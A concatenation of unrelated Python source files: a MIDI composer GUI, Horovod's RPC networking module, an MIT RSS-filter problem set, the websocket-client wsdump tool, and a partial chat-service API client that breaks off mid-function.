pygame.init()
# song preview connections
self.ui.playButton.clicked.connect(self.playButton_clicked)
self.ui.pauseButton.clicked.connect(self.pauseButton_clicked)
self.rootfp = getSourceFilePath()
# trackview graph settings
def load_file_clicked(self):
print('load button clicked')
fname, ok = QFileDialog.getOpenFileName(self, 'Open File','./', 'MIDI files (*.mid)')
if ok:
self.load_file(fname)
def load_file(self, fname):
self.new_clicked()
# HACK not actually allowing you to change old data
self.loaded_stream = converter.parse(fname)
self.update_track()
def save_file_clicked(self):
print('save')
fname, ok = QFileDialog.getSaveFileName(self, 'Save File','./', 'MIDI files (*.mid)')
if ok:
temp_stream = self.get_stream()
temp_stream.write('midi', fname)
def new_clicked(self):
print('new!')
self.ui.label.setPixmap(QPixmap(''))
self.init_variables()
self.reset_btns()
self.ui.random_note.setEnabled(False)
self.ui.custom_btn.setEnabled(False)
self.ui.comboBox.setEnabled(False)
self.ui.comboBox.clear()
self.ui.comboBox_2.setCurrentIndex(0)
def displayAbout(self):
print('about')
self.about = About(self)
self.about.show()
def on_change_tab(self):
print('tab change %i' % self.ui.tabWidget.currentIndex())
def on_add_track_btn_clicked(self):
print('add_track')
self.tracks.append(Add_track(self))
self.tracks[-1].show()
def on_comboBox_currentIndexChanged(self, index):
print('index changed to ',index)
if (index < 0):
return
self.cur_track = index
self.reset_btns()
self.update_btns()
def on_comboBox_2_currentIndexChanged(self, index):
self.num_notes = index + 1
def on_note1_clicked(self):
if QApplication.keyboardModifiers() == QtCore.Qt.ShiftModifier:
self.play_note_from_text(self.ui.note1.text())
else:
self.add_note(self.ui.note1)
def on_note2_clicked(self):
if QApplication.keyboardModifiers() == QtCore.Qt.ShiftModifier:
self.play_note_from_text(self.ui.note2.text())
else:
self.add_note(self.ui.note2)
def on_note3_clicked(self):
if QApplication.keyboardModifiers() == QtCore.Qt.ShiftModifier:
self.play_note_from_text(self.ui.note3.text())
else:
self.add_note(self.ui.note3)
def on_random_note_clicked(self):
'''if QApplication.keyboardModifiers() == QtCore.Qt.ShiftModifier:
self.play_note_from_text(self.ui.random_note.text())
else:
self.add_note(self.ui.random_note)'''
self.add_note(self.ui.random_note)
def on_custom_btn_clicked(self):
if QApplication.keyboardModifiers() == QtCore.Qt.ShiftModifier:
text = self.ui.custom_note.text()
if (self.try_catch(text) is None):
return
self.play_note_from_text(text)
else:
self.add_note(self.ui.custom_btn)
def add_note(self, btn):
print('add_note ',btn)
for i in range(self.num_notes):
to_app = None
if (btn == self.ui.random_note):
if (self.tracks[self.cur_track].chords):
to_app = self.get_rn_from_num(np.random.randint(0,14))
else:
to_app = note.Note(np.random.randint(40,70))
elif (btn == self.ui.custom_btn):
text = self.ui.custom_note.text()
to_app = self.try_catch(text)
if (to_app is None):
return
else:
if (btn == self.ui.note1):
to_app = self.model_notes[self.cur_track][0]
elif (btn == self.ui.note2):
to_app = self.model_notes[self.cur_track][1]
elif (btn == self.ui.note3):
to_app = self.model_notes[self.cur_track][2]
#Assumes all quarter notes --> magic number is 4
cur_track_noteCount = len(self.s[self.cur_track].flat.notes)
if (cur_track_noteCount % 4 == 0):
self.s[self.cur_track].append(stream.Measure(number=cur_track_noteCount / 4))
self.s[self.cur_track][-1].append(to_app)
self.update_btns(False)
self.update_btns()
self.update_track()
def error_msg(self):
print('error msg')
self.error = Dialog2(self)
self.error.show()
def playButton_clicked(self):
print('play')
temp_mid_path = str( self.rootfp.joinpath('mid', TEMP_MIDI))
temp_stream = self.get_stream()
temp_stream.write('midi',temp_mid_path)
mixer.music.load(temp_mid_path)
mixer.music.play(0)
#thread = threading.Thread(target=self.updateSlider(), args=())
#thread.daemon = True
#thread.start()
def pauseButton_clicked(self):
print('stopping music')
mixer.music.stop()
def update_track(self):
print('update_track')
#self.s = converter.parse("tinyNotation: d'8 f g a b2 c'4 C c c c1")
if LILY_ENABLED is True:
self.s.write('lily.png', self.rootfp.joinpath('img', 'notes.lily'))
pp = QPixmap(str(self.rootfp.joinpath('img', 'notes.lily.png')))
self.ui.label_4.setPixmap(pp)
temp_stream = self.get_stream()
#self.s.show('text')
temp_stream = self.get_stream()
pianoroll = graph.plot.HorizontalBarPitchSpaceOffset(temp_stream)
pianoroll.figureSize = (8,6)
pianoroll.colorBackgroundData = '#000000'
pianoroll.colorBackgroundFigure = '#000000'
pianoroll.colorGrid = '#222222'
pianoroll.alpha = 1.0
pianoroll.colors = ['Cyan', '#fc900a', 'yellow', '#abfd00', '#fc0aab', \
'#fb00ab', '#ef1200', '#bb0222', '#cb10de', '#44dd77', '#4444ff', \
'#0fbcff' ]
pianoroll.doneAction = None
pianoroll.title = None
pianoroll.margin = 0
pianoroll.tickFontSize = 8
#pianoroll.barSpace = 32
#pianoroll.hideLeftBottomSpines = True
self.get_stream().show('text')
pianoroll.run()
pr_path = self.rootfp.joinpath('img', 'notes.png')
pianoroll.subplot.tick_params(axis='x', colors='white')
pianoroll.subplot.tick_params(axis='y', colors='white')
pianoroll.figure.savefig(str(pr_path), facecolor='k')
p = QPixmap( str(pr_path) )
self.ui.label.setPixmap(p)
def update_btns(self, change_text=True):
print('update_btns')
suggestion_btns = [self.ui.note1, self.ui.note2, self.ui.note3]
cur_track_notes = self.s[self.cur_track].flat.notes
if ((len(self.tracks) > self.cur_track) and
(self.tracks[self.cur_track].model is not None) and
(len(cur_track_notes) >= self.tracks[self.cur_track].min_notes)):
base_notes = None
cur_track_obj = self.tracks[self.cur_track]
if (isinstance(cur_track_obj.model, First_markov)):
if (cur_track_obj.chords):
base_notes = chord_to_num[cur_track_notes[-1].figure]
else:
base_notes = cur_track_notes[-1].pitch.midi
elif (isinstance(cur_track_obj.model, Sec_markov)):
if (cur_track_obj.chords):
base_notes = [chord_to_num[cur_track_notes[len(cur_track_notes) - 2].figure], chord_to_num[cur_track_notes[-1].figure]]
else:
base_notes = [cur_track_notes[len(cur_track_notes) - 2].pitch.midi, cur_track_notes[-1].pitch.midi]
self.model_notes[self.cur_track] = num_to_note(cur_track_obj.model.getBestThree(base_notes), cur_track_obj.chords, cur_track_obj)
if (change_text):
for i in range(len(suggestion_btns)):
if (i < len(self.model_notes[self.cur_track])):
suggestion_btns[i].setEnabled(True)
if cur_track_obj.chords:
suggestion_btns[i].setText(self.model_notes[self.cur_track][i].figure)
else:
suggestion_btns[i].setText(self.model_notes[self.cur_track][i].nameWithOctave)
else:
suggestion_btns[i].setEnabled(False)
suggestion_btns[i].setText('Possible Note ' + str(i+1))
def after_add_track(self):
self.ui.comboBox.setEnabled(True)
self.ui.random_note.setEnabled(True)
self.ui.custom_btn.setEnabled(True)
self.s.insert(0, stream.Part())
self.s[-1].append(self.tracks[-1].instrument)
self.model_notes.append([])
self.ui.comboBox.addItem(str(len(self.tracks)))
self.ui.comboBox.setCurrentIndex(len(self.tracks) - 1)
self.reset_btns()
def reset_btns(self):
suggestion_btns = [self.ui.note1, self.ui.note2, self.ui.note3]
for i in range(len(suggestion_btns)):
suggestion_btns[i].setEnabled(False)
suggestion_btns[i].setText('Possible Note ' + str(i+1))
def init_variables(self):
self.s = stream.Score()
self.tracks = []
self.model_notes = []
self.cur_track = 0
self.num_notes = 1
self.loaded_stream = None
def get_stream(self):
ret = stream.Stream()
ret.insert(0, self.s)
if (self.loaded_stream is not None):
ret.insert(0, self.loaded_stream)
return ret
def get_rn_from_num(self, num):
rand_rn = num_to_chord[num]
return roman.RomanNumeral(rand_rn, self.tracks[self.cur_track].key)
def play_note_from_text(self, n):
to_play = None
if (self.tracks[self.cur_track].chords):
to_play = roman.RomanNumeral(n, self.tracks[self.cur_track].key)
else:
to_play = note.Note(n)
temp_mid_path = str( self.rootfp.joinpath('mid', TEMP_MIDI))
to_play.write('midi',temp_mid_path)
mixer.music.load(temp_mid_path)
mixer.music.play(0)
def try_catch(self,text):
to_app = None
try:
if (self.tracks[self.cur_track].chords):
if text not in chord_to_num:
raise pitch.AccidentalException
to_app = roman.RomanNumeral(text, self.tracks[self.cur_track].key)
else:
to_app = note.Note(text)
return to_app
except (pitch.AccidentalException, roman.RomanException, pitch.PitchException):
self.error_msg()
print('exception found')
return None
except pitch.PitchException:
self.error_msg()
print('exception found')
return None
except roman.RomanException:
self.error_msg()
print('exception found')
return None
def num_to_note(num_list, chords, cur_track_obj):
ret = []
for elem in num_list:
n = None
if (chords):
n = roman.RomanNumeral(num_to_chord[elem],cur_track_obj.key)
else:
n = note.Note(elem)
ret.append(n)
return ret
|
network.py
|
# Copyright 2019 Uber Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import random
import socket
import struct
import threading
import cloudpickle
import psutil
from six.moves import queue, socketserver
from horovod.run.common.util import secret
class PingRequest(object):
pass
class NoValidAddressesFound(Exception):
pass
class PingResponse(object):
def __init__(self, service_name, source_address):
self.service_name = service_name
"""Service name that responded to this ping."""
self.source_address = source_address
"""Source IP address that was visible to the service."""
class AckResponse(object):
"""Used for situations when the response does not carry any data."""
pass
class Wire(object):
"""
Used for serialization/deserialization of objects over the wire.
We use HMAC to protect services from unauthorized use. The key used for
the HMAC digest is distributed by Open MPI and Spark.
The objects are serialized using cloudpickle. Serialized objects become
the body of the message.
Structure of the message is as follows:
- HMAC digest of the body (32 bytes)
- length of the body (4 bytes)
- body
"""
def __init__(self, key):
self._key = key
def write(self, obj, wfile):
message = cloudpickle.dumps(obj)
digest = secret.compute_digest(self._key, message)
wfile.write(digest)
# Pack message length into 4-byte integer.
wfile.write(struct.pack('i', len(message)))
wfile.write(message)
wfile.flush()
def read(self, rfile):
digest = rfile.read(secret.DIGEST_LENGTH)
# Unpack message length into 4-byte integer.
message_len = struct.unpack('i', rfile.read(4))[0]
message = rfile.read(message_len)
if not secret.check_digest(self._key, message, digest):
raise Exception('Security error: digest did not match the message.')
return cloudpickle.loads(message)
class BasicService(object):
def __init__(self, service_name, key):
self._service_name = service_name
self._wire = Wire(key)
self._server = self._make_server()
self._port = self._server.socket.getsockname()[1]
self._thread = threading.Thread(target=self._server.serve_forever)
self._thread.daemon = True
self._thread.start()
def _make_server(self):
min_port = 1024
max_port = 65536
num_ports = max_port - min_port
start_port = random.randrange(0, num_ports)
for port_offset in range(num_ports):
try:
port = min_port + (start_port + port_offset) % num_ports
return socketserver.ThreadingTCPServer(('0.0.0.0', port), self._make_handler())
except:
pass
raise Exception('Unable to find a port to bind to.')
def _make_handler(self):
server = self
class _Handler(socketserver.StreamRequestHandler):
def handle(self):
try:
req = server._wire.read(self.rfile)
resp = server._handle(req, self.client_address)
if not resp:
raise Exception('Handler did not return a response.')
server._wire.write(resp, self.wfile)
except EOFError:
# Happens when client is abruptly terminated, don't want to pollute the logs.
pass
return _Handler
def _handle(self, req, client_address):
if isinstance(req, PingRequest):
return PingResponse(self._service_name, client_address[0])
raise NotImplementedError(req)
def addresses(self):
result = {}
for intf, intf_addresses in psutil.net_if_addrs().items():
for addr in intf_addresses:
if addr.family == socket.AF_INET:
if intf not in result:
result[intf] = []
result[intf].append((addr.address, self._port))
return result
def shutdown(self):
self._server.shutdown()
self._server.server_close()
self._thread.join()
def get_port(self):
return self._port
class BasicClient(object):
def __init__(self, service_name, addresses, key, match_intf=False,
probe_timeout=20, retries=3):
# Note: because of retry logic, ALL RPC calls are REQUIRED to be idempotent.
self._service_name = service_name
self._wire = Wire(key)
self._match_intf = match_intf
self._probe_timeout = probe_timeout
self._retries = retries
self._addresses = self._probe(addresses)
if not self._addresses:
raise NoValidAddressesFound(
'Unable to connect to the %s on any of the addresses: %s'
% (service_name, addresses))
def _probe(self, addresses):
result_queue = queue.Queue()
threads = []
for intf, intf_addresses in addresses.items():
for addr in intf_addresses:
thread = threading.Thread(target=self._probe_one,
args=(intf, addr, result_queue))
thread.daemon = True
thread.start()
threads.append(thread)
for t in threads:
t.join()
result = {}
while not result_queue.empty():
intf, addr = result_queue.get()
if intf not in result:
result[intf] = []
result[intf].append(addr)
return result
def _probe_one(self, intf, addr, result_queue):
for iter in range(self._retries):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self._probe_timeout)
try:
sock.connect(addr)
rfile = sock.makefile('rb')
wfile = sock.makefile('wb')
try:
self._wire.write(PingRequest(), wfile)
resp = self._wire.read(rfile)
if resp.service_name != self._service_name:
return
if self._match_intf:
# Interface name of destination and source must match
# since `match_intf` is requested.
client_intf_addrs = [x.address
for x in psutil.net_if_addrs().get(intf, [])
if x.family == socket.AF_INET]
if resp.source_address not in client_intf_addrs:
return
result_queue.put((intf, addr))
return
finally:
rfile.close()
wfile.close()
except:
pass
finally:
sock.close()
def _send_one(self, addr, req):
for iter in range(self._retries):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(addr)
rfile = sock.makefile('rb')
wfile = sock.makefile('wb')
try:
self._wire.write(req, wfile)
resp = self._wire.read(rfile)
return resp
finally:
rfile.close()
wfile.close()
except:
if iter == self._retries - 1:
# Raise exception on the last retry.
raise
finally:
sock.close()
def _send(self, req):
# Since all the addresses were vetted, use the first one.
addr = list(self._addresses.values())[0][0]
return self._send_one(addr, req)
def addresses(self):
return self._addresses
|
app.py
|
from receiver import receiveCount
from webServer import webserver
from multiprocessing import Process
p2 = Process(target=receiveCount)
p2.start()
p1 = Process(target=webserver)
p1.start()
# and so on
p2.join()
p1.join()
# the join means wait untill it finished
|
ps5.py
|
# 6.0001/6.00 Problem Set 5 - RSS Feed Filter
# Name: Daniel Sprehe
# Date: 4/16/2020
import feedparser
import string
import time
import threading
from ps5_project_util import translate_html
from mtTkinter import *
from datetime import datetime
import pytz
# -----------------------------------------------------------------------
# ======================
# Code for retrieving and parsing
# Google and Yahoo News feeds
# Do not change this code
# ======================
def process(url):
"""
Fetches news items from the rss url and parses them.
Returns a list of NewsStory-s.
"""
feed = feedparser.parse(url)
entries = feed.entries
ret = []
for entry in entries:
guid = entry.guid
title = translate_html(entry.title)
link = entry.link
description = translate_html(entry.description)
pubdate = translate_html(entry.published)
try:
pubdate = datetime.strptime(pubdate, "%a, %d %b %Y %H:%M:%S %Z")
pubdate.replace(tzinfo=pytz.timezone("GMT"))
# pubdate = pubdate.astimezone(pytz.timezone('EST'))
# pubdate.replace(tzinfo=None)
except ValueError:
pubdate = datetime.strptime(pubdate, "%a, %d %b %Y %H:%M:%S %z")
newsStory = NewsStory(guid, title, description, link, pubdate)
ret.append(newsStory)
return ret
# ======================
# Data structure design
# ======================
# Problem 1
class NewsStory:
def __init__(self, guid, title, description, link, pubdate):
self.guid = guid
self.title = title
self.description = description
self.link = link
self.pubdate = pubdate
def get_guid(self):
return self.guid
def get_title(self):
return self.title
def get_description(self):
return self.description
def get_link(self):
return self.link
def get_pubdate(self):
return self.pubdate
# ======================
# Triggers
# ======================
class Trigger(object):
def evaluate(self, story):
"""
Returns True if an alert should be generated
for the given news item, or False otherwise.
"""
# DO NOT CHANGE THIS!
raise NotImplementedError
# PHRASE TRIGGERS
# Problem 2
class PhraseTrigger(Trigger):
def __init__(self, phrase):
self.phrase = phrase.lower()
def is_phrase_in(self, text):
new_text = ''
# Clean the text
for symbol in string.punctuation:
text = text.replace(symbol, ' ')
split_text = text.split()
for word in split_text:
new_text += word.strip() + ' '
# Check the text for the phrase
if self.phrase.lower() in new_text.lower():
for word in self.phrase.lower().split():
if word in new_text.lower().split():
continue
else:
return False
return True
else:
return False
# Problem 3
class TitleTrigger(PhraseTrigger):
def __init__(self, phrase):
super().__init__(phrase)
def evaluate(self, story):
"""
Returns True if an alert should be generated
for the given news item, or False otherwise.
"""
if self.is_phrase_in(story.get_title()):
return True
else:
return False
# Problem 4
class DescriptionTrigger(PhraseTrigger):
def __init__(self, phrase):
super().__init__(phrase)
def evaluate(self, story):
"""
Returns True if an alert should be generated
for the given news item, or False otherwise.
"""
if self.is_phrase_in(story.get_description()):
return True
else:
return False
# TIME TRIGGERS
# Problem 5
class TimeTrigger(Trigger):
# Constructor:
# Input: Time has to be in EST and in the format of "%d %b %Y %H:%M:%S".
# Convert time from string to a datetime before saving it as an attribute.
def __init__(self, time):
self.time = datetime.strptime(time, "%d %b %Y %H:%M:%S").replace(
tzinfo=pytz.timezone("EST"))
# Problem 6
class BeforeTrigger(TimeTrigger):
def __init__(self, time):
super().__init__(time)
def evaluate(self, story):
"""
Returns True if an alert should be generated
for the given news item, or False otherwise.
"""
return self.time > story.get_pubdate().replace(tzinfo=pytz.timezone("EST"))
class AfterTrigger(TimeTrigger):
def __init__(self, time):
super().__init__(time)
def evaluate(self, story):
"""
Returns True if an alert should be generated
for the given news item, or False otherwise.
"""
return self.time < story.get_pubdate().replace(tzinfo=pytz.timezone("EST"))
# COMPOSITE TRIGGERS
# Problem 7
class NotTrigger(Trigger):
def __init__(self, OtherTrigger):
self.OtherTrigger = OtherTrigger
def evaluate(self, story):
"""
Returns True if an alert should be generated
for the given news item, or False otherwise.
"""
return not self.OtherTrigger.evaluate(story)
# Problem 8
class AndTrigger(Trigger):
def __init__(self, Trigger1, Trigger2):
self.Trigger1 = Trigger1
self.Trigger2 = Trigger2
def evaluate(self, story):
"""
Returns True if an alert should be generated
for the given news item, or False otherwise.
"""
return self.Trigger1.evaluate(story) and self.Trigger2.evaluate(story)
# Problem 9
class OrTrigger(Trigger):
def __init__(self, Trigger1, Trigger2):
self.Trigger1 = Trigger1
self.Trigger2 = Trigger2
def evaluate(self, story):
"""
Returns True if an alert should be generated
for the given news item, or False otherwise.
"""
return self.Trigger1.evaluate(story) or self.Trigger2.evaluate(story)
# ======================
# Filtering
# ======================
# Problem 10
def filter_stories(stories, triggerlist):
"""
Takes in a list of NewsStory instances.
Returns: a list of only the stories for which a trigger in triggerlist fires.
"""
new_stories = []
for trig in triggerlist:
for story in stories:
if trig.evaluate(story):
new_stories.append(story)
return new_stories
# ======================
# User-Specified Triggers
# ======================
def trigger_list_dictionary(triggerlines):
triggers = {}
for line in triggerlines:
line = line.split(',')
if line[0][0] == 't':
if line[1] == 'TITLE':
triggers[line[0]] = TitleTrigger(line[2])
if line[1] == 'DESCRIPTION':
triggers[line[0]] = DescriptionTrigger(line[2])
if line[1] == 'AFTER':
triggers[line[0]] = AfterTrigger(line[2])
if line[1] == 'BEFORE':
triggers[line[0]] = BeforeTrigger(line[2])
if line[1] == 'NOT':
triggers[line[0]] = NotTrigger(triggers[line[2]])
if line[1] == 'AND':
triggers[line[0]] = AndTrigger(
triggers[line[2]], triggers[line[3]])
if line[1] == 'OR':
triggers[line[0]] = OrTrigger(
triggers[line[2]], triggers[line[3]])
return triggers
# Problem 11
def read_trigger_config(filename):
"""
filename: the name of a trigger configuration file
Returns: a list of trigger objects specified by the trigger configuration
file.
"""
# We give you the code to read in the file and eliminate blank lines and
# comments. You don't need to know how it works for now!
trigger_file = open(filename, 'r')
lines = []
triggerlist = []
for line in trigger_file:
line = line.rstrip()
if not (len(line) == 0 or line.startswith('//')):
lines.append(line)
# TODO: Problem 11
# line is the list of lines that you need to parse and for which you need
# to build triggers
trigger_dict = trigger_list_dictionary(lines)
for line in lines:
line = line.split(',')
if line[0] == 'ADD':
for triggers in line:
if triggers[0] == 't':
triggerlist.append(trigger_dict[triggers])
return triggerlist
SLEEPTIME = 120 # seconds -- how often we poll
def main_thread(master):
# A sample trigger list - you might need to change the phrases to correspond
# to what is currently in the news
try:
'''t1 = TitleTrigger("election")
t2 = DescriptionTrigger("Trump")
t3 = DescriptionTrigger("Clinton")
t4 = AndTrigger(t2, t3)
triggerlist = [t1, t4]'''
# Problem 11
# TODO: After implementing read_trigger_config, uncomment this line
triggerlist = read_trigger_config('ps5_triggers.txt')
# HELPER CODE - you don't need to understand this!
# Draws the popup window that displays the filtered stories
# Retrieves and filters the stories from the RSS feeds
frame = Frame(master)
frame.pack(side=BOTTOM)
scrollbar = Scrollbar(master)
scrollbar.pack(side=RIGHT, fill=Y)
t = "Top News"
title = StringVar()
title.set(t)
ttl = Label(master, textvariable=title, font=("Helvetica", 18))
ttl.pack(side=TOP)
cont = Text(master, font=("Helvetica", 14), yscrollcommand=scrollbar.set)
cont.pack(side=BOTTOM)
cont.tag_config("title", justify='center')
button = Button(frame, text="Exit", command=root.destroy)
button.pack(side=BOTTOM)
guidShown = []
def get_cont(newstory):
if newstory.get_guid() not in guidShown:
cont.insert(END, newstory.get_title()+"\n", "title")
cont.insert(
END, "\n---------------------------------------------------------------\n", "title")
cont.insert(END, newstory.get_description())
cont.insert(
END, "\n*********************************************************************\n", "title")
guidShown.append(newstory.get_guid())
while True:
print("Polling . . .", end=' ')
stories = []
# Get stories from Google's Top Stories RSS news feed
stories += process("http://news.google.com/news?output=rss")
# Get stories from more RSS feeds
# Reddit has error - No published Attribute
# stories += process("https://www.reddit.com/r/worldnews/.rss")
# Reddit has error - No description Attribute
# stories += process("https://news.yahoo.com/rss/topstories")
stories = filter_stories(stories, triggerlist)
list(map(get_cont, stories))
scrollbar.config(command=cont.yview)
print("Sleeping...")
time.sleep(SLEEPTIME)
except Exception as e:
print(e)
if __name__ == '__main__':
root = Tk()
root.title("Some RSS parser")
t = threading.Thread(target=main_thread, args=(root,))
t.start()
root.mainloop()
|
wsdump.py
|
#!/Users/Amish/Development/Trading/gemini-trading-app2/venv/bin/python
import argparse
import code
import sys
import threading
import time
import ssl
import gzip
import zlib
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
class RawInput:
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = list(map(str.strip, args.headers.split(',')))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
if isinstance(data, bytes) and len(data)>2 and data[:2] == b'\037\213': # gzip magick
try:
data = "[gzip] " + str(gzip.decompress(data), "utf-8")
except:
pass
elif isinstance(data, bytes):
try:
data = "[zlib] " + str(zlib.decompress(data, -zlib.MAX_WBITS), "utf-8")
except:
pass
if isinstance(data, bytes):
data = repr(data)
if args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
else:
msg = data
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
client.py
|
from typing import BinaryIO
from .lib.objects import *
from .lib.exceptions import *
from .threads import Threads
from .eventsource import SSE, Recall
import threading
import random
import requests
import json
class Client(Threads, Recall, SSE):
def __init__(self, session_id: int = str(random.randint(1, 9999))):
self.token = None
self.headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
"session-id": session_id,
"x-user-agent": "14 Web/1 ru"
}
self.api = "https://capture.chat/api"
Threads.__init__(self)
Recall.__init__(self)
SSE.__init__(self, self)
def handle(self, data, event):
return self.solve(data, event)
def login_token(self, token: str):
self.headers["X-Token"] = token
self.token = token
def get_topic_id(self, url: str):
response = requests.get(f"{self.api}/link/preview?url={url}", headers=self.headers)
topic_id = str(response.json()["topic_id"])
if response.status_code != 200: CheckExceptions(response.json())
else: return topic_id
def get_notifications(self):
response = requests.get(f"{self.api}/notification", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return Notifications(response.json()["items"]).Notifications
def get_topic_users(self, topicId: str, count: int = 10):
response = requests.get(f"{self.api}/topic/{topicId}/member?count={count}", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return UserProfileList(response.json()["items"]).UserProfileList
def get_user_topics(self, userId: str, count: int = 10):
response = requests.get(f"{self.api}/user/{userId}/topic?count={count}", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return TopicList(response.json()["items"]).TopicList
def get_discover_topic(self, count: int = 10, type: str = "default"):
if type == "default": api = f"{self.api}/topic/discover?count={count}"
if type == "latest": api = f"{self.api}/topic/discover?count={count}"
elif type == "trending": api = f"{self.api}/topic/discover/1582634058468904012?count={count}"
elif type == "chats": api = f"{self.api}/topic/discover/1582658119463642908?count={count}"
elif type == "topics": api = f"{self.api}/topic/discover/1582658869630172140?count={count}"
response = requests.get(api)
if response.status_code != 200: CheckExceptions(response.json())
else:
if type == "latest": return TopicList(response.json()["collections"]).TopicList
else: return TopicList(response.json()["items"]).TopicList
def get_topics(self, count: int = 10):
response = requests.get(f"{self.api}/topic?count={count}", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return TopicList(response.json()["items"]).TopicList
def get_user_info(self, userId: str):
response = requests.get(f"{self.api}/user/{userId}", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return UserProfile(response.json()).UserProfile
def get_trending_gif(self):
response = requests.get(f"{self.api}/gifs/trending", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return Gifs(response.json()).Gifs
def get_topic_photos(self, topicId: str, count: str = 50, reverse: bool = True):
if reverse: reverse = "true"
elif not reverse: reverse = "false"
response = requests.get(f"{self.api}/topic/{topicId}/photo?count={count}&reverse={reverse}", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return PhotoList(response.json()["items"]).PhotoList
def get_topic_messages(self, topicId: str, count: int = 10):
response = requests.get(f"{self.api}/topic/{topicId}/message?count={count}", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return MessageList(response.json()["items"]).MessageList
def search_mention_users(self, topicId: str, prefix: str = ""):
response = requests.get(f"{self.api}/topic/{topicId}/mention/suggest?prefix={prefix}", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return UserProfileList(response.json()["users"]).UserProfileList
def send_message(self, topicId: str, message: str = None, replyMessage: str = None, photo: [BinaryIO, list] = None, gifId: str = None, gifProvider: str = None):
links = []
if photo:
if isinstance(photo, list): photos = photo
try:
photo.__getattribute__("name")
photos = [photo]
except: TypeError("Photo should be BinaryIO!")
for photo in photos:
multipart = {'photo': (photo.__getattribute__("name"), photo), }
response = requests.post(f"{self.api}/topic/{topicId}/message/photo", headers=self.headers, files=multipart)
if response.status_code != 200: CheckExceptions(response.json())
